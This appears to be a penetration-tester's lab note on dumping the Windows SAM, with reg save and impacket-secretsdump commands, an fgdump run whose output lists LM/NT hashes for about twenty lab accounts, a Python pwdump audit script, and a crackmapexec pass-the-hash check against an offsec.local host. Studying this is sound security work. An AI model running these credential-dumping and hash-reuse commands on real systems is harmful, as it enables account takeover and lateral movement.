Traditional dumping
To dump the SAM this way, save two registry hives (the SAM itself and the SYSTEM hive that holds the boot key needed to decrypt it):

```
reg save hklm\sam c:\sam
reg save hklm\system c:\system
```
Use impacket-secretsdump on the copied hives to extract the hashes (samdump2 does not give correct results here):

```
impacket-secretsdump -system system -sam sam LOCAL
```
Examples: Acute
fgdump.exe
Another way to extract the hashes (useful on older Windows versions) is the fgdump executable: upload it to the server and run it; on success it writes a pwdump-format file (127.0.0.1.pwdump in the run below), one line per account as user:RID:LM hash:NT hash:::

```
fgdump.exe
type 127.0.0.1.pwdump
admin:1007:A46139FEAAF2B9F117306D272A9441BB:C5E0002FDE3F5EB2CF5730FFEE58EBCC:::
Administrator:500:7BFD3EE62CBB0EBA886450C5D6C50F12:F3ACBE7EC27AADBE8DEEAA0C651A64AF:::
backup:1006:16AC416C2658E00DAAD3B435B51404EE:938DF8B296DD15D0DCE8EAA37BE593E0:::
david:1009:43AF16FFF22F1628AAD3B435B51404EE:1FBFF38CAE51E9918DA1FEC572F03E11:::
gary:1013:998D9DC042886317C72BEFE227197AE1:BA359FA9D25791C2180E424BB7BB0753:::
Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:::
homer:1017:EF91A6D3CF901B8BAAD3B435B51404EE:B184D292A82B6AD35C3CFCA81F1F59BC:::
IUSR_SRV2:1020:F7D96EBCBE5B6BE3103CCB00190F6271:09FF503707453D56BB69F40BEF542DA0:::
IWAM_SRV2:1019:96FE1FC02D73A84C463DB170B09126F1:BE6EC26D0D71A533E14B65CE755D7BCE:::
john:1010:E52CAC67419A9A2238F10713B629B565:5835048CE94AD0564E29A924A03510EF:::
lee:1015:B096847EAD9B7476AAD3B435B51404EE:208ADB08381ADAB3032EEDBD35399642:::
lisa:1011:A179639DCAF4E1C4AAD3B435B51404EE:8ACF28FDC0168E003FB3E05BCB463D1B:::
mark:1012:6C3D4C343F999422AAD3B435B51404EE:BCD477BFDB45435A34C6A38403CA4364:::
ned:1016:836EDA0FBC609E6393E28745B8BF4BA6:4F16328129408ED105DEC3A938C266EB:::
nick:1014:59B8B93A9A6477E4AAD3B435B51404EE:EE28AD35A22C752C1A75BE3F9A7E82C9:::
simon:1008:598DDCE2660D3193AAD3B435B51404EE:2D20D252A479F485CDF5E171D93985BF:::
sqlusr:1005:6307AB24156C541AAAD3B435B51404EE:6A370590BD44AC8E65D045254A170AB7:::
todd:1018:9E00B755E79C8CF95533B366E9511E4B:4150133921FE34DD2E777B1CA0361410:::
TsInternetUser:1000:E52CAC67419A9A22F96F275E1115B16F:E22E04519AA757D12F1219C4F31252F4:::
```
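As an added example (not part of the original notes or of fgdump/impacket), a small Python parser for the pwdump format shown above that audits a dump the way a defender reviewing it would: accounts that still store an LM hash (LM hashing was not disabled when the password was set), LM hashes whose second half is the empty-block constant (password of seven characters or fewer), and accounts sharing one NT hash (same password). The regex and function names are my own; the sample lines come from the dumps on this page except the constructed `svc_backup` line.

```python
import re
from typing import NamedTuple

# LM hash of the empty password; it is what secretsdump/crackmapexec show when no LM hash is stored.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
# Second DES block of EMPTY_LM: an LM hash ending in it has an empty second half, so the password is <= 7 chars.
EMPTY_LM_HALF = EMPTY_LM[16:]
PWDUMP_RE = re.compile(r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[^:]*):(?P<nt>[^:]*):::$")

class PwdumpEntry(NamedTuple):
    user: str
    rid: int
    lm: str  # lower-case hex, or the "no password..." marker fgdump writes when the hash is absent
    nt: str

    def has_password(self) -> bool:
        return not (self.lm.startswith("no password") or self.nt.startswith("no password"))

def parse_pwdump(text: str) -> list:
    """Parse user:rid:lmhash:nthash::: lines; reject anything not in that format."""
    entries = []
    for line in (l.strip() for l in text.splitlines() if l.strip()):
        m = PWDUMP_RE.match(line)
        if m is None:
            raise ValueError(f"not a pwdump line: {line!r}")
        entries.append(PwdumpEntry(m["user"], int(m["rid"]), m["lm"].lower(), m["nt"].lower()))
    return entries

def audit(entries: list) -> dict:
    """Findings a defender wants from a dump: LM hashes still stored, short passwords, shared passwords."""
    lm_stored, lm_short, by_nt = [], [], {}
    for e in entries:
        if not e.has_password():
            continue
        if e.lm != EMPTY_LM:  # LM hashing was not disabled when this password was set
            lm_stored.append(e.user)
            if e.lm.endswith(EMPTY_LM_HALF):
                lm_short.append(e.user)
        by_nt.setdefault(e.nt, []).append(e.user)  # identical NT hash means identical password
    shared_nt = {h: users for h, users in by_nt.items() if len(users) > 1}
    return {"lm_stored": lm_stored, "lm_short": lm_short, "shared_nt": shared_nt}

# Sample input: the first four lines are from the dumps above; svc_backup is constructed for this example.
SAMPLE = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8c802621d2e36fc074345dded890f3e5:::
Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:::
david:1009:43AF16FFF22F1628AAD3B435B51404EE:1FBFF38CAE51E9918DA1FEC572F03E11:::
todd:1018:9E00B755E79C8CF95533B366E9511E4B:4150133921FE34DD2E777B1CA0361410:::
svc_backup:1021:aad3b435b51404eeaad3b435b51404ee:8c802621d2e36fc074345dded890f3e5:::
"""
```

Running `audit(parse_pwdump(SAMPLE))` flags david and todd as still having LM hashes, david's as a seven-character-or-shorter password, and Administrator and svc_backup as sharing a password.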
Then validate the retrieved hash with crackmapexec, passing it in LM:NT form (an absent LM hash is written as aad3b435b51404eeaad3b435b51404ee) and checking that authentication succeeds:

```
crackmapexec winrm 192.168.143.59 -u Administrator -p aad3b435b51404eeaad3b435b51404ee:8c802621d2e36fc074345dded890f3e5 -d offsec.local
```
For further details on using this hash in a pass-the-hash attack, refer to [[Pass The Hash#^093000]]